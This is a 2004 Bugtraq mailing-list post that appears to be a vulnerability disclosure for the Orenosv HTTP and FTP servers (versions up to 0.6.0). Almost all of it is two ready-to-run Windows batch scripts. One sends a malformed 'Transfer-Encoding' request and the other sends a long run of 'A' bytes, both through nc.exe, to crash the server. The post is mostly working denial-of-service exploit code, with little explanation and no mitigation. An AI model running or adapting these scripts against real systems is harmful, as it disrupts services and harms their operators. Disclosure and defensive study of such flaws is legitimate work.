[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Nt959396838068.15687@mx1>
Date: Thu, 3 Jun 2004 16:19:12 +0800
From: "CoolICE" <CoolICE@...na.com>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "vuldb" <vuldb@...urityfocus.com>
Subject: DOS@...nosv
DOS_OrenosvHTTPd.bat
@echo on
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: Orenosv Server
:Vendors: http://home.comcast.net/~makataoka/orenosv060.zip
:Version: <=0.6.0
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-06-02
:Author: CoolICE
:E-mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=9999
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run
e 100 "GET / HTTP/1.0" 0D 0A
e 110 "Transfer-Encoding: Boy" 0D 0A 0D 0A
rcx
2A
nhttp.tmp
w
q
:run
nc %1 %PORT% < http.tmp
del http.tmp
=====================================================
DOS_OrenosvFTPd.bat
@echo off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application: Orenosv FTP Server
:Vendors: http://home.comcast.net/~makataoka//orenosv060.zip
:Version: <=0.6.0
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-06-02
:Author: CoolICE
:E-mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=21
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run
F 100 200 41
rcx
100
ndos.a
w
q
:run
nc %1 %PORT% < dos.a
del dos.a
Powered by blists - more mailing lists